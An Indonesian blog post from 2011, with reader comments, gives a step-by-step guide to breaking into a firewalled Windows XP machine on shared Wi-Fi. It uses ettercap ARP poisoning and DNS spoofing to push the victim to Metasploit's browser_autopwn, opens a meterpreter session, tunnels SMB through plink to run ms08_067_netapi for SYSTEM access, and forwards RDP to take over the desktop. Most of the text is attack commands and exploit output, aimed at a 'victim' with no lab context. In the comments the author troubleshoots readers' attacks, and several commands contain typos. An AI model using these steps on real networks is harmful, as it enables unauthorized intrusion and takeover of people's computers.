Hehe.. Jangan bosen-bosennya membaca post dari saya ya? Kali ini saya mau sharing metasploit.. Memang mudah mengeksploit Windows XP Service Pack 2 tanpa firewall.. Tapi kalo dipasang firewall?? Lalu gimana jika korban ternyata bukan seorang administrator, dimana privilege nya sangat terbatas?? Saya akan beritau caranya, tutorial ini akan panjang, jadi sarankan jika ingin membaca tutorial ini, siapkan secangkir kopi dan sebatang rokok..
Briefing:
Pastikan anda memiliki program ini:
1. nmap
2. metasploit
3. ettercap
Tutorial:
Hal penting yang harus diketahui adalah menyadari bahwa korban menggunakan firewall, sehingga membatasi perintah ping dari luar, bagaimana cara mengetahuinya?
Buka terminal, lalu ketik
Code:
nmap [IP address korban]
Contoh, korban memiliki IP address 192.168.1.10, maka perintahnya adalah:
Code:
nmap 192.168.1.10
Jika korban memang menggunakan firewall, maka outputnya akan tampak seperti ini
Code:
All 1000 scanned ports on 192.168.1.10 are filtered
Dalam kasus seperti ini, anda tidak dapat menggunakan exploit standar
Code:
exploit/windows/smb/ms08_067_netapi
Karena hasilnya akan nihil, karena koneksi ditolak oleh firewall. Lalu, bagaimana cara melewati firewall ini??
Buka metasploit kamu:
root@red-dragon:/# cd /pentest/exploits/framework2/
root@red-dragon:/pentest/exploits/framework2# ./msfconsole
Kemudian gunakan auxiliary browser_autopwn
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Kemudian atur auxiliary kamu.
msf auxiliary(browser_autopwn) > set LHOST [ip address kamu]
msf auxiliary(browser_autopwn) > set SRVHOST [ip address kamu]
msf auxiliary(browser_autopwn) > set SRVPORT 80
msf auxiliary(browser_autopwn) > set URIPATH /
Terakhir, jalankan auxiliary kamu.
msf auxiliary(browser_autopwn) > exploit -j
Tunggu sampai semua exploit dan payload berhasil di siapkan, kemudian kita akan bermain ke jaringan.
Menunggu memang membosankan, jadi lebih baik kita routing koneksi korban ke IP address kita. Perlu diketahui, auxiliary/server/browser_autopwn akan bereaksi jika korban mengakses IP address kita melalui browser internet. Ini akan memperkecil peluang eksploitasi, untuk itu daripada menunggu tanpa kepastian, lebih baik membuat kepastian. Gunakan dns_spoofing ettercap. :)
Sebelum memulai spoofing dns, kita harus mengatur ulang konfigurasi dns. Caranya, buka terminal, lalu ketik:
Code:
root@red-dragon:/# gedit /usr/share/ettercap/etter.dns
Hapus semua, dan masukan
Code:
* A [IP address kamu]
Jika IP address kamu 192.168.1.2, maka
Code:
* A 192.168.1.2
Simpan konfigurasi, kemudian eksekusi spoofing dns menggunakan ettercap.
Code:
root@red-dragon:/# ettercap -i [interface] [option] /target 1/ /target 2/
Dalam kasus ini, saya berada di wifi area, IP address korban 192.168.1.10, dan IP address access poin 192.168.1.1
Maka.
- Interface = wlan0
- target 1 = 192.168.1.1
- target 2 = 192.168.1.10
Masukan perintah ini ke dalam terminal:
Code:
root@red-dragon:/# ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.1.1/ /192.168.1.10/
Dengan ini, alamat apapun yang korban masukan di address bar akan menjadi ----> 192.168.1.2 alias IP address kita. Dengan ini, metasploit akan bereaksi terhadap klien yang mengakses IP address kita melalui browser internetnya.
Perhatikan output metasploit:
[*] request '/' from 192.168.1.10:1809
[*] request '/?essid=xxxxxxxxxxxxxx' from 192.168.1.10:1809
[*] responding with exploits
[*] ending internet explorer COM CreateObject Code Execution exploit HTML to 192.168.1.10:1809
[*] sending EXE payload to 192.168.1.10:1809
[*] sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.1.2:3333 -> 192.168.1.10:1809)
Memasuki tahap meterpreter dalam komputer yang tidak memiliki akses khusus layaknya administrator tidaklah terlalu menyenangkan. Selain hak yang dibatasi, tidak akan ada banyak perintah yang berfungsi dalam command prompt. Untuk mengangkat privilege, kita harus masuk ke sesi meterpreter terlebih dahulu. Masukan perintah ini di dalam metasploit:
Code:
msf auxiliary(browser_autopwn) > session -i l
Ini berfungsi untuk berinteraksi dengan meterpreter sesi pertama.
meterpreter > getuid
Outpunya:
user
Ini menunjukan bahwa pengguna bernama user.
meterpreter > shell
C:\Documents and Settings\user\Desktop> net user stdio stdio /add
Perintah ini akan gagal diekseksi, karena pengguna tidak menjalankan komputer atau leptopnya atas nama administrator. Jika bagini, kita membutuhkan software jahat yang disediakan backtrack untuk mengubah user menjadi administrator.
C:\Documents and Settings\user\Desktop> netstat -an
Perhatikan port 445 yang terbuka dalam network status. Kemudian kita kembali lagi pada sesi meterpreter, untuk mengupload program jahat.
C:\Documents and Settings\user\Desktop>exit
meterpreter > upload /pentest/windows-binaries/tools/plink.exe "C:\\documents and settings\user\desktop\\"Jika upload berhasil, langkah selanjutnya adalah kembali lagi ke command prompt untuk mengeksekusi program jahat tersebut.
meterpreter > shell
C:\Documents and Settings\user\Desktop>plink.exe -l [username] -pw [password] -R port:localhost:port [ip address kamu]
Contoh dalam kasus ini, saya ingin username saya root, dan password toor, dengan port 445 yang terbuka, dan IP local host 127.0.0.1 dan ip address saya 192.168.1.2 maka:
-l = root
-pw = toor
ip address = 192.168.1.2
Jadi masukan perintah ini:
C:\Documents and Settings\user\Desktop>pling.exe -l root -pw toor -R 445:127.0.0.1:445 192.168.1.2
Buka terminal baru dan ketik:
root@red-dragon:~# netstat -antp |grep 445
Jika 127.0.0.1ada dalam daftar, maka kita siap melakukan exploitasi tahap kedua. Masukan perintah berikut:
./pentest/exploits/framework3/msfconsole
Code:
msf > use exploit/windows/smb/ms08_067_netapi
Code:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Code:
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.2
Code:
msf exploit(ms08_067_netapi) > set RHOST 127.0.01
Code:
msf exploit(ms08_067_netapi) > set RPORT 445
Code:
msf exploit(ms08_067_netapi) > exploit -j
OUTPUT:
[*]Started reverse handler on 192.168.1.2:4444
[*]Automatically detecting the taget..
[*]Fingerprint: Windows XP Service Pack 2 - lang:English
[*]Selected Target: Windows XP SP 2 English (NX)
[*]Triggering the vulnerability...
[*]Sending stage (748032 bytes)
[*]Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.10:1809)
meterpreter >
Pada meterpreter ini, kita akan menguji apakah kita sudah menjadi administrator atau belum:
Masukan kode berikut:
Code:
meterpreter > getuid
Jika kita sudah menjadi administrator, maka outputnya akan tampak seperti ini:
Code:
meterpreter > NT AUTHORITY\SYSTEM
Cukupkah? Saya rasa belum jika kita belum meremote desktop korban. Perlu diingat bahwa koneksi VNC (Program untuk remote desktop) berjalan di port 3389. Kembali kita gunakan tplink.exe
meterpreter > shell
C:\WINDOWS\system32>cd c:\documents and settings\user\desktop
C:\Documents and Settings/user/Desktop> net stdio stdio /add
C:\Documents and Settings/user/Desktop> C:
C:\tplink.exe -l root -pw toor 3389:127.0.0.1:3389 192.168.1.2
Untuk meremote desktop korban, kita hanya perlu mengeksekusi rdesktop. Buka terminal baru, lalu masukan perintah:
Code:
rdesktop 127.0.01
Untuk Username, masukan root.
Dan untuk password, masukan toor.
GAME OVER. Desktop sudah kamu kendalikan. Keyboard, dan mouse ada dalam kuasa kita.
Powered by: Metasploit ettercap blue-dragon
Thanks for Yoshephine Handini for yout support and love
October 21, 2011
Subscribe to:
Post Comments (Atom)
waktu saya coba, ketika saya mulai menggunakan use auxiliary/server/browser_autopwn kok ngga bisa ya ?
ReplyDeleteyang keluar malah msfconsole: use: please specify a valid exploit name
saya sudah benar loh penulisannya
kalau menggunakan jaringan internet kabel, bagaimana perintah pada ettercap ?
ReplyDeletecoba ketik: show auxiliary
ReplyDeletekalo emang di list-nya gak ada auxiliary/server/browser_autopwn
berarti belum update. coba update msf-nya.
untuk jaringan kabel, ganti wlan0 menjadi eth0 pada section interface (-i)
/# ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.1.1/ /192.168.1.10/
ReplyDeleteyang keluar malah gini :
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
MITM method 'ARP-REMOTE' not supported...
bagaimana mengatasinya. saya menggunakan jaringan kabel
Versi 0.7.3 ya?
ReplyDeleteGanti jadi ARP:REMOTE
Mas Omega yang di edit scrip /usr/local/share/ettercap/etter.dns di bagian mana....atau kah semua scrip nya di hapus atau cuma di bagian A aja...
ReplyDeletedan ARP-REMOTE di BT saya juga gak suport...
gmana dengan cara begini ettercap -T -q -i eth1 -P dns_spoof -M arp // //
atau kah sma......????
cukup tambahkan saja
ReplyDelete* A [IP Address Backtrack]
Pada baris terakhir.
Untuk interface eth1, perintahnya adalah:
ettercap -T -q -i eth1 -M ARP:REMOTE // // -P dns_spoof
maaf saya mau tanya om dan sekalian juga kepada master master metasploit nih..
ReplyDeletesaya newbie neh jadi agak bego, begini saya udah lakukan nmap IP Target dan hasil nya :
Nmap scan report for 192.168.x.xx
Host is up (0.00068s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
2222/tcp open EtherNet/IP-1
3389/tcp open ms-term-serv
4899/tcp open radmin
MAC Address: 00:1A:92:62:A2:5C (Asustek Computer)
Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds
msf >
pertanyaanya apakah ini berarti firewall komp target tidak aktive
dan setelah saya exploit dengan use /windows/smb/ms08_067_netapi
dan payload set payload windows/shell/reverse_tcp
lalu set lhost ip saya
dan set rhost ip target
dan terakhir exploit dan alhasil :
[*] Started reverse handler on 192.168.1.112:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) >
kenapa tidak ada kelanjutan nya ya seperti cth di atas :
[*]Sending stage (748032 bytes)
[*]Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.10:1809)
mohon pencerahan nya terima kasih banyak dan mohon maaf ngerepotin sebelumnya.salam
Ada kemungkinan target menggunakan antivirus. Kemungkinan lain adalah target telah melakukan patching pada netapi.dll. Sehingga vulnerability tidak terpicu.
Deleteditempat ane IP address access pointnya ga ketauan karna pake proxy. Apa kaya gini bisa ?
ReplyDeleteettercap -i [interface] [option] /target 1/ /target 2/
dimana :
interface : wlan0
ip address korban : 192.168.1.39
ip address proxy : 192.168.1.240
Atau ada cara supaya bisa liat ip address access point? makasih gan
kalo kyk gini kenapa yah?
ReplyDeleteettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.1.1/ /192.168.1.100/
ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team
MiTM method 'ARP-REMOTE' not supported...
keren gan
ReplyDeletegan kalau di windoaws 7 bisa kagak
ReplyDeletebravo!!!! bravo!!! bro contac me we have sometthing to disscuss
ReplyDeletegua ingin ngobrol banyak...... (h) (h) (h)